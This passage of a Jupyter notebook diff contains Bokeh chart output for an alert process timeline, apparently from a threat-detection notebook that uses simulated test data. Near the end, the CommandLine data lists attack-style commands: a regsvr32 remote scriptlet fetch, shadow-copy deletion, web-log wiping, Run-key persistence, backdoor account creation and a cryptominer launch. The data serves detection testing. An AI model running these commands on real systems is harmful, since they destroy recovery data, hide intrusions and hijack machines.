chart\",\"text_font_size\":{\"value\":\"10px\"}},\"id\":\"1692\",\"type\":\"Title\"},{\"attributes\":{},\"id\":\"1721\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"fill_alpha\":0.2,\"fill_color\":\"navy\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[2,2],\"line_width\":0.5},\"id\":\"1701\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"days\":[1,4,7,10,13,16,19,22,25,28]},\"id\":\"1739\",\"type\":\"DaysTicker\"},{\"attributes\":{\"formatter\":{\"id\":\"1717\"},\"ticker\":{\"id\":\"1660\"},\"visible\":false},\"id\":\"1659\",\"type\":\"LinearAxis\"},{\"attributes\":{},\"id\":\"1717\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"days\":[\"%m-%d %H:%M\"],\"hours\":[\"%H:%M:%S\"],\"milliseconds\":[\"%H:%M:%S.%3N\"],\"minutes\":[\"%H:%M:%S\"],\"seconds\":[\"%H:%M:%S\"]},\"id\":\"1693\",\"type\":\"DatetimeTickFormatter\"},{\"attributes\":{\"active_drag\":\"auto\",\"active_inspect\":\"auto\",\"active_multi\":null,\"active_scroll\":\"auto\",\"active_tap\":\"auto\",\"tools\":[{\"id\":\"1643\"},{\"id\":\"1663\"},{\"id\":\"1664\"},{\"id\":\"1665\"},{\"id\":\"1666\"},{\"id\":\"1667\"}]},\"id\":\"1669\",\"type\":\"Toolbar\"},{\"attributes\":{\"text\":\"Range Selector\"},\"id\":\"1677\",\"type\":\"Title\"},{\"attributes\":{\"months\":[0,1,2,3,4,5,6,7,8,9,10,11]},\"id\":\"1729\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"source\":{\"id\":\"1642\"}},\"id\":\"1711\",\"type\":\"CDSView\"},{\"attributes\":{\"base\":60,\"mantissas\":[1,2,5,10,15,20,30],\"max_interval\":1800000.0,\"min_interval\":1000.0,\"num_minor_ticks\":0},\"id\":\"1723\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.5},\"fill_color\":{\"value\":\"navy\"},\"line_alpha\":{\"value\":0.5},\"line_color\":{\"value\":\"navy\"},\"size\":{\"units\":\"screen\",\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"1708\",\"type\":\"Diamond\"},{\"attributes\":{\"fill_color\":{\"value\":\"navy\"},\"line_color\":{\"value\":\"navy\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"1696\",\"type\":\"Circle\"},{\"attributes\":{\"callback\":null,\"formatters\":{\"@TimeGenerated\":\"datetime\"},\"tooltips\":[[\"TimeGenerated\",\"@TimeGenerated{%F %T.%3N}\"],[\"LogonType\",\"@LogonType\"],[\"Account\",\"@Account\"]]},\"id\":\"1643\",\"type\":\"HoverTool\"},{\"attributes\":{\"bottom_units\":\"screen\",\"fill_alpha\":0.5,\"fill_color\":\"lightgrey\",\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[4,4],\"line_width\":2,\"right_units\":\"screen\",\"top_units\":\"screen\"},\"id\":\"1668\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"1740\",\"type\":\"DaysTicker\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"navy\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"navy\"},\"size\":{\"units\":\"screen\",\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"1709\",\"type\":\"Diamond\"},{\"attributes\":{\"data_source\":{\"id\":\"1642\"},\"glyph\":{\"id\":\"1708\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1709\"},\"selection_glyph\":null,\"view\":{\"id\":\"1711\"}},\"id\":\"1710\",\"type\":\"GlyphRenderer\"}],\"root_ids\":[\"1712\"]},\"title\":\"Bokeh Application\",\"version\":\"2.2.2\"}};\n  var render_items = [{\"docid\":\"279a3b0a-8aa5-41bb-8a4e-94892c4ea56d\",\"root_ids\":[\"1712\"],\"roots\":{\"1712\":\"02234e03-5e58-4026-a1a3-de89c89dc9fd\"}}];\n  root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n\n  }\n  if (root.Bokeh !== undefined) {\n    embed_document(root);\n  } else {\n    var attempts = 0;\n    var timer = setInterval(function(root) {\n      if (root.Bokeh !== undefined) {\n        clearInterval(timer);\n        embed_document(root);\n      } else {\n        attempts++;\n        if (attempts > 100) {\n          clearInterval(timer);\n          console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n        }\n      }\n    }, 10, root)\n  }\n})(window);"
+     },
+     "metadata": {
+      "application/vnd.bokehjs_exec.v0+json": {
+       "id": "1712"
+      }
+     }
+    },
+    {
+     "output_type": "display_data",
+     "data": {
+      "text/html": [
+       "\n",
+       "    <div class=\"bk-root\">\n",
+       "        <a href=\"https://bokeh.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n",
+       "        <span id=\"1917\">Loading BokehJS ...</span>\n",
+       "    </div>"
+      ]
+     },
+     "metadata": {}
+    },
+    {
+     "output_type": "display_data",
+     "data": {
+      "application/javascript": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  var JS_MIME_TYPE = 'application/javascript';\n  var HTML_MIME_TYPE = 'text/html';\n  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n  var CLASS_NAME = 'output_bokeh rendered_html';\n\n  /**\n   * Render data to the DOM node\n   */\n  function render(props, node) {\n    var script = document.createElement(\"script\");\n    node.appendChild(script);\n  }\n\n  /**\n   * Handle when an output is cleared or removed\n   */\n  function handleClearOutput(event, handle) {\n    var cell = handle.cell;\n\n    var id = cell.output_area._bokeh_element_id;\n    var server_id = cell.output_area._bokeh_server_id;\n    // Clean up Bokeh references\n    if (id != null && id in Bokeh.index) {\n      Bokeh.index[id].model.document.clear();\n      delete Bokeh.index[id];\n    }\n\n    if (server_id !== undefined) {\n      // Clean up Bokeh references\n      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n      cell.notebook.kernel.execute(cmd, {\n        iopub: {\n          output: function(msg) {\n            var id = msg.content.text.trim();\n            if (id in Bokeh.index) {\n              Bokeh.index[id].model.document.clear();\n              delete Bokeh.index[id];\n            }\n          }\n        }\n      });\n      // Destroy server and session\n      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n      cell.notebook.kernel.execute(cmd);\n    }\n  }\n\n  /**\n   * Handle when a new output is added\n   */\n  function handleAddOutput(event, handle) {\n    var output_area = handle.output_area;\n    var output = handle.output;\n\n    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n    if ((output.output_type != \"display_data\") || (!output.data.hasOwnProperty(EXEC_MIME_TYPE))) {\n      return\n    }\n\n    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n\n    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n      // store reference to embed id on output_area\n      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n    }\n    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n      var bk_div = document.createElement(\"div\");\n      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n      var script_attrs = bk_div.children[0].attributes;\n      for (var i = 0; i < script_attrs.length; i++) {\n        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n      }\n      // store reference to server id on output_area\n      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n    }\n  }\n\n  function register_renderer(events, OutputArea) {\n\n    function append_mime(data, metadata, element) {\n      // create a DOM node to render to\n      var toinsert = this.create_output_subarea(\n        metadata,\n        CLASS_NAME,\n        EXEC_MIME_TYPE\n      );\n      this.keyboard_manager.register_events(toinsert);\n      // Render to node\n      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n      render(props, toinsert[toinsert.length - 1]);\n      element.append(toinsert);\n      return toinsert\n    }\n\n    /* Handle when an output is cleared or removed */\n    events.on('clear_output.CodeCell', handleClearOutput);\n    events.on('delete.Cell', handleClearOutput);\n\n    /* Handle when a new output is added */\n    events.on('output_added.OutputArea', handleAddOutput);\n\n    /**\n     * Register the mime type and append_mime function with output_area\n     */\n    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n      /* Is output safe? */\n      safe: true,\n      /* Index of renderer in `output_area.display_order` */\n      index: 0\n    });\n  }\n\n  // register the mime type if in Jupyter Notebook environment and previously unregistered\n  if (root.Jupyter !== undefined) {\n    var events = require('base/js/events');\n    var OutputArea = require('notebook/js/outputarea').OutputArea;\n\n    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n      register_renderer(events, OutputArea);\n    }\n  }\n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(\"1917\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error() {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (var i = 0; i < css_urls.length; i++) {\n      var url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error;\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.2.2.min.js\": \"JayppSWSRBsibIZqI8S4vAb1oFgLL0uhNvSn8cmArlOvYOwfFjYeyY5UWwJ+K0SU\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.2.2.min.js\": \"G0/Tv/Yy/zEPNsnW0Qif/FOsGesd+KIrKg/QLmvQmReuUW9qmSP7mAmr0VpiUNr3\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.2.2.min.js\": \"VLYHEbLQDk5G1+/4ALU0myoJPMEUsngWry2fzYorFOUmarjGRPLLURaeK/on6JqX\"};\n\n    for (var i = 0; i < js_urls.length; i++) {\n      var url = js_urls[i];\n      var element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error;\n      element.async = false;\n      element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.2.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.2.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.2.2.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(\"1917\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));",
+      "application/vnd.bokehjs_load.v0+json": ""
+     },
+     "metadata": {}
+    },
+    {
+     "output_type": "display_data",
+     "data": {
+      "text/html": [
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "  <div class=\"bk-root\" id=\"fef2aee8-6a1f-448d-8c76-d6f0f8ff6c34\" data-root-id=\"1988\"></div>\n"
+      ]
+     },
+     "metadata": {}
+    },
+    {
+     "output_type": "display_data",
+     "data": {
+      "application/vnd.bokehjs_exec.v0+json": "",
+      "application/javascript": "(function(root) {\n  function embed_document(root) {\n    \n  var docs_json = {\"c1ea0993-3441-4050-b8a6-911e85003b63\":{\"roots\":{\"references\":[{\"attributes\":{\"children\":[{\"id\":\"1920\"},{\"id\":\"1952\"}]},\"id\":\"1988\",\"type\":\"Column\"},{\"attributes\":{\"days\":[1,4,7,10,13,16,19,22,25,28]},\"id\":\"2002\",\"type\":\"DaysTicker\"},{\"attributes\":{\"days\":[1,4,7,10,13,16,19,22,25,28]},\"id\":\"2015\",\"type\":\"DaysTicker\"},{\"attributes\":{\"axis\":{\"id\":\"1931\"},\"minor_grid_line_alpha\":0.3,\"minor_grid_line_color\":\"navy\",\"ticker\":null},\"id\":\"1934\",\"type\":\"Grid\"},{\"attributes\":{\"overlay\":{\"id\":\"1977\"},\"x_range\":{\"id\":\"1923\"},\"y_range\":null},\"id\":\"1976\",\"type\":\"RangeTool\"},{\"attributes\":{\"months\":[0,1,2,3,4,5,6,7,8,9,10,11]},\"id\":\"2005\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"months\":[0,1,2,3,4,5,6,7,8,9,10,11]},\"id\":\"2018\",\"type\":\"MonthsTicker\"},{\"attributes\":{},\"id\":\"1936\",\"type\":\"BasicTicker\"},{\"attributes\":{\"fill_color\":{\"value\":\"navy\"},\"line_color\":{\"value\":\"navy\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"1972\",\"type\":\"Circle\"},{\"attributes\":{\"axis_label\":\"Event Time\",\"formatter\":{\"id\":\"1981\"},\"ticker\":{\"id\":\"1932\"}},\"id\":\"1931\",\"type\":\"DatetimeAxis\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"2003\",\"type\":\"DaysTicker\"},{\"attributes\":{\"fill_alpha\":0.2,\"fill_color\":\"navy\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[2,2],\"line_width\":0.5},\"id\":\"1977\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"months\":[0,6]},\"id\":\"2021\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"end\":1547529321273.9998,\"start\":1547529301390.0002},\"id\":\"1923\",\"type\":\"Range1d\"},{\"attributes\":{\"days\":[\"%m-%d %H:%M\"],\"hours\":[\"%H:%M:%S\"],\"milliseconds\":[\"%H:%M:%S.%3N\"],\"minutes\":[\"%H:%M:%S\"],\"seconds\":[\"%H:%M:%S\"]},\"id\":\"1969\",\"type\":\"DatetimeTickFormatter\"},{\"attributes\":{\"days\":[1,15]},\"id\":\"2004\",\"type\":\"DaysTicker\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"2016\",\"type\":\"DaysTicker\"},{\"attributes\":{\"formatter\":{\"id\":\"1993\"},\"ticker\":{\"id\":\"1936\"},\"visible\":false},\"id\":\"1935\",\"type\":\"LinearAxis\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.5},\"fill_color\":{\"value\":\"navy\"},\"line_alpha\":{\"value\":0.5},\"line_color\":{\"value\":\"navy\"},\"size\":{\"units\":\"screen\",\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"1984\",\"type\":\"Diamond\"},{\"attributes\":{\"months\":[0,2,4,6,8,10]},\"id\":\"2019\",\"type\":\"MonthsTicker\"},{\"attributes\":{},\"id\":\"2022\",\"type\":\"YearsTicker\"},{\"attributes\":{\"active_drag\":\"auto\",\"active_inspect\":\"auto\",\"active_multi\":null,\"active_scroll\":\"auto\",\"active_tap\":\"auto\",\"tools\":[{\"id\":\"1919\"},{\"id\":\"1939\"},{\"id\":\"1940\"},{\"id\":\"1941\"},{\"id\":\"1942\"},{\"id\":\"1943\"}]},\"id\":\"1945\",\"type\":\"Toolbar\"},{\"attributes\":{\"text\":\"Range Selector\"},\"id\":\"1953\",\"type\":\"Title\"},{\"attributes\":{\"data_source\":{\"id\":\"1918\"},\"glyph\":{\"id\":\"1984\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1985\"},\"selection_glyph\":null,\"view\":{\"id\":\"1987\"}},\"id\":\"1986\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"months\":[0,2,4,6,8,10]},\"id\":\"2006\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"axis\":{\"id\":\"1963\"},\"ticker\":null},\"id\":\"1966\",\"type\":\"Grid\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"navy\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"navy\"},\"size\":{\"units\":\"screen\",\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"1985\",\"type\":\"Diamond\"},{\"attributes\":{\"bottom_units\":\"screen\",\"fill_alpha\":0.5,\"fill_color\":\"lightgrey\",\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[4,4],\"line_width\":2,\"right_units\":\"screen\",\"top_units\":\"screen\"},\"id\":\"1944\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"2007\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"axis\":{\"id\":\"1935\"},\"dimension\":1,\"grid_line_color\":null,\"ticker\":null},\"id\":\"1938\",\"type\":\"Grid\"},{\"attributes\":{\"align\":\"right\",\"text\":\"Drag the middle or edges of the selection box to change the range in the main chart\",\"text_font_size\":{\"value\":\"10px\"}},\"id\":\"1968\",\"type\":\"Title\"},{\"attributes\":{\"source\":{\"id\":\"1918\"}},\"id\":\"1987\",\"type\":\"CDSView\"},{\"attributes\":{\"below\":[{\"id\":\"1931\"}],\"center\":[{\"id\":\"1934\"},{\"id\":\"1938\"}],\"left\":[{\"id\":\"1935\"}],\"min_border_left\":50,\"plot_height\":200,\"plot_width\":900,\"renderers\":[{\"id\":\"1986\"}],\"title\":{\"id\":\"1921\"},\"toolbar\":{\"id\":\"1945\"},\"x_range\":{\"id\":\"1923\"},\"x_scale\":{\"id\":\"1927\"},\"y_range\":{\"id\":\"1925\"},\"y_scale\":{\"id\":\"1929\"}},\"id\":\"1920\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{},\"id\":\"1957\",\"type\":\"DataRange1d\"},{\"attributes\":{\"months\":[0,6]},\"id\":\"2008\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"active_drag\":\"auto\",\"active_inspect\":\"auto\",\"active_multi\":{\"id\":\"1976\"},\"active_scroll\":\"auto\",\"active_tap\":\"auto\",\"tools\":[{\"id\":\"1976\"}]},\"id\":\"1967\",\"type\":\"Toolbar\"},{\"attributes\":{\"num_minor_ticks\":5,\"tickers\":[{\"id\":\"2011\"},{\"id\":\"2012\"},{\"id\":\"2013\"},{\"id\":\"2014\"},{\"id\":\"2015\"},{\"id\":\"2016\"},{\"id\":\"2017\"},{\"id\":\"2018\"},{\"id\":\"2019\"},{\"id\":\"2020\"},{\"id\":\"2021\"},{\"id\":\"2022\"}]},\"id\":\"1964\",\"type\":\"DatetimeTicker\"},{\"attributes\":{\"base\":60,\"mantissas\":[1,2,5,10,15,20,30],\"max_interval\":1800000.0,\"min_interval\":1000.0,\"num_minor_ticks\":0},\"id\":\"1999\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{},\"id\":\"1993\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{},\"id\":\"1929\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"1996\",\"type\":\"Selection\"},{\"attributes\":{\"base\":60,\"mantissas\":[1,2,5,10,15,20,30],\"max_interval\":1800000.0,\"min_interval\":1000.0,\"num_minor_ticks\":0},\"id\":\"2012\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"2020\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"text\":\"Timeline: Alert Process Session\"},\"id\":\"1921\",\"type\":\"Title\"},{\"attributes\":{},\"id\":\"1997\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"1939\",\"type\":\"WheelZoomTool\"},{\"attributes\":{},\"id\":\"2009\",\"type\":\"YearsTicker\"},{\"attributes\":{},\"id\":\"1942\",\"type\":\"SaveTool\"},{\"attributes\":{\"days\":[1,15]},\"id\":\"2017\",\"type\":\"DaysTicker\"},{\"attributes\":{},\"id\":\"1959\",\"type\":\"LinearScale\"},{\"attributes\":{\"overlay\":{\"id\":\"1944\"}},\"id\":\"1940\",\"type\":\"BoxZoomTool\"},{\"attributes\":{\"source\":{\"id\":\"1918\"}},\"id\":\"1975\",\"type\":\"CDSView\"},{\"attributes\":{\"mantissas\":[1,2,5],\"max_interval\":500.0,\"num_minor_ticks\":0},\"id\":\"1998\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"data_source\":{\"id\":\"1918\"},\"glyph\":{\"id\":\"1972\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1973\"},\"selection_glyph\":null,\"view\":{\"id\":\"1975\"}},\"id\":\"1974\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"end\":1547529322102.5,\"start\":1547529300561.5},\"id\":\"1955\",\"type\":\"Range1d\"},{\"attributes\":{},\"id\":\"1941\",\"type\":\"ResetTool\"},{\"attributes\":{\"days\":[\"%m-%d %H:%M\"],\"hours\":[\"%H:%M:%S\"],\"milliseconds\":[\"%H:%M:%S.%3N\"],\"minutes\":[\"%H:%M:%S\"],\"seconds\":[\"%H:%M:%S\"]},\"id\":\"1981\",\"type\":\"DatetimeTickFormatter\"},{\"attributes\":{\"below\":[{\"id\":\"1963\"},{\"id\":\"1968\"}],\"center\":[{\"id\":\"1966\"}],\"plot_height\":120,\"plot_width\":900,\"renderers\":[{\"id\":\"1974\"}],\"title\":{\"id\":\"1953\"},\"toolbar\":{\"id\":\"1967\"},\"toolbar_location\":null,\"x_range\":{\"id\":\"1955\"},\"x_scale\":{\"id\":\"1959\"},\"y_range\":{\"id\":\"1957\"},\"y_scale\":{\"id\":\"1961\"}},\"id\":\"1952\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"start\":-1.0},\"id\":\"1925\",\"type\":\"Range1d\"},{\"attributes\":{},\"id\":\"1961\",\"type\":\"LinearScale\"},{\"attributes\":{\"formatter\":{\"id\":\"1969\"},\"ticker\":{\"id\":\"1964\"}},\"id\":\"1963\",\"type\":\"DatetimeAxis\"},{\"attributes\":{\"data\":{\"CommandLine\":[\".\\\\ftp  -s:C:\\\\RECYCLER\\\\xxppyy.exe\",\".\\\\reg  not /domain:everything that /sid:shines is\\n/krbtgt:golden !\",\"cmd  /c \\\"systeminfo && systeminfo\\\"\",\".\\\\rundll32  /C 42424.exe\",\".\\\\rundll32  /C c:\\\\users\\\\MSTICAdmin\\\\42424.exe\",\".\\\\rundll32  /C 1234.exe\",\".\\\\rundll32  /C c:\\\\users\\\\MSTICAdmin\\\\1234.exe\",\".\\\\rundll32  /C reg.exe\",\".\\\\reg.exe  add\\n\\\\hkcu\\\\software\\\\microsoft\\\\some\\\\key\\\\Run /v abadvalue\",\"c:\\\\Diagnostics\\\\UserTmp\\\\tsetup.1.exe  C:\\\\Users\\\\MSTI\\nCAdmin\\\\AppData\\\\Local\\\\Temp\\\\2\\\\is-01DD7.tmp\\\\tsetup.1.\\n0.14.tmp\\\" /SL5=\\\"$250276,19992586,423424,C:\\\\Users\\\\M\\nSTICAdmin\\\\Downloads\\\\tsetup.1.0.14.exe\",\".\\\\rundll32.exe  /C mshtml,RunHTMLApplication\\njavascript:alert(tada!)\",\".\\\\netsh.exe  \\\"in (*.exe) do start # artificial\\ncommandline solely for purposes of triggering\\ntest\\\"\",\".\\\\cmd  /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&powershell\\nSet-ExecutionPolicy RemoteSigned&echo [S]&cd&echo\\n[E]\\\"\",\".\\\\cmd  /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&powershell\\nEnable-WSManCredSSP =2013Role Server -force&echo\\n[S]&cd&echo [E]\\\"\",\".\\\\cmd  /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&powershell\\nwinrm set winrm/config/service/Auth\\n@{Kerberos=003D\\\"true\\\"}&echo [S]&cd&echo [E]\\\"\",\".\\\\cmd  /c \\\"cd /d \\\"C:\\\\ProgramData\\\"&copy \\\\\\\\[REDACTED\\n]\\\\c$\\\\users\\\\[REDACTED]\\\\Documents\\\\\\\"Password Change\\nDates.docx\\\"\",\".\\\\cmd  /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&c:\\\\windows\\\\s\\nystem32\\\\inetsrv\\\\appcmd set config \\\"Default Web\\nSite/\\\" /section:httplogging /dontLog:true&echo\\n[S]&cd&echo [E]\\\"\",\".\\\\cmd  /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&del\\nC:\\\\inetpub\\\\logs\\\\logFiles\\\\W3SVC1\\\\*.log /q&echo\\n[S]&cd&echo [E]\\\"\",\"c:\\\\Diagnostics\\\\UserTmp\\\\perfc.dat\",\"c:\\\\Diagnostics\\\\UserTmp\\\\sdopfjiowtbkjfnbeioruj.exe\",\"c:\\\\Diagnostics\\\\UserTmp\\\\doubleextension.pdf.exe\",\"vssadmin  delete shadows /all /quiet\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"cmd  /c echo Any questions about the commands\\nexecuted here then please contact one of\",\"cmd  /c echo timb@microsoft.com;\\nromead@microsoft.com; ianhelle@microsoft.com;\\nmarcook@microsoft.com; dotanp@microsoft.com;\\nliengli@microsoft.com\",\"net  user adm1nistrator Bob_testing /add\",\"net  share TestShare=c:\\\\testshare\\n/Grant:Users,Read\",\"net  use q: \\\\\\\\MSTICAlertsWin1\\\\TestShare\\nBob_testing /User:adm1nistrator\",\"net  use q: /delete\",\"net  share TestShare /delete\",\"net  user adm1nistrator /delete\",\".\\\\regsvr32   /s /n /u /i:http://server/file.sct\\nscrobj.dll\",\".\\\\suchost.exe   -a cryptonight -o bcn -u\\nbond007.01 -p x -t 4\",\"cmd  /c \\\"echo TVqQAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\n>> 